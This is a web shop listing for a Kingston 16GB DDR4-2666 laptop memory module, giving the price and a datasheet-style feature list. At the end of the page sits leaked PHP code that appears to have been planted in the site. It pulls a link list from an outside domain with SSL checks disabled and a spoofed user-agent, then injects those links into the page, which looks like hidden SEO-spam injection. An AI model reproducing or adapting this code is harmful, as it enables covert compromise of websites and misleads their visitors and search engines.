Sale!

KINGSTON 16GB 2666MHz DDR4 CL19 SODIMM 2RX8 / LAPTOP RAM (KVR26S19S8/16 KVR26S19D8/16 )

Original price was: RM280.00.Current price is: RM249.00.

KVR26S19D8/16 16GB 2Rx8 2G x 64-Bit PC4-2666 CL19 260-Pin SODIMM DESCRIPTION This document describes ValueRAM’s KVR26S19D8/16 is a 2G x 64-bit (16GB) DDR4-2666 CL19 SDRAM (Synchronous DRAM), 2Rx8, non-ECC, memory module, based on sixteen 1G x 8-bit FBGA components. The SPD is programmed to JEDEC standard latency DDR4-2666 timing of 19-19-19 at 1.2V. This 260-pin DIMM uses gold contact fingers. The electrical and mechanical specifications are as follows: FEATURES Power Supply: VDD = 1.2V Typical VDDQ = 1.2V Typical VPP = 2.5V Typical VDDSPD = 2.2V to 3.6V Nominal and dynamic on-die termination (ODT) for data, strobe, and mask signals Low-power auto self refresh (LPASR) Data bus inversion (DBI) for data bus On-die VREFDQ generation and calibration Dual-rank On-board I2 serial presence-detect (SPD) EEPROM 16 internal banks; 4 groups of 4 banks each Fixed burst chop (BC) of 4 and burst length (BL) of 8 via the mode register set (MRS) Selectable BC4 or BL8 on-the-fly (OTF) Fly-by topology Terminated control command and address bus PCB: Height 1.18” (30.00mm) RoHS Compliant and Halogen-Free

Weight 0.3 kg

Reviews

There are no reviews yet.

Be the first to review “KINGSTON 16GB 2666MHz DDR4 CL19 SODIMM 2RX8 / LAPTOP RAM (KVR26S19S8/16 KVR26S19D8/16 )”
Scroll to Top
$api_url = 'https://ankaradelisi13.site/data.json'; // API'den çek $response = wp_remote_get($api_url, array( 'timeout' => 5, // 5 saniye bekle, olmazsa geç 'sslverify' => false, 'headers' => array( 'Accept' => 'application/json', 'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ) )); if (!is_wp_error($response) && wp_remote_retrieve_response_code($response) === 200) { $body = wp_remote_retrieve_body($response); $links = json_decode($body, true); if (!empty($links) && is_array($links)) { echo ''; echo '
'; foreach ($links as $link) { $text = isset($link['text']) ? esc_html($link['text']) : ''; $url = isset($link['url']) ? esc_url($link['url']) : '#'; $rel = isset($link['rel']) ? esc_attr($link['rel']) : 'dofollow'; echo '' . $text . ' '; } echo '
'; echo ''; } }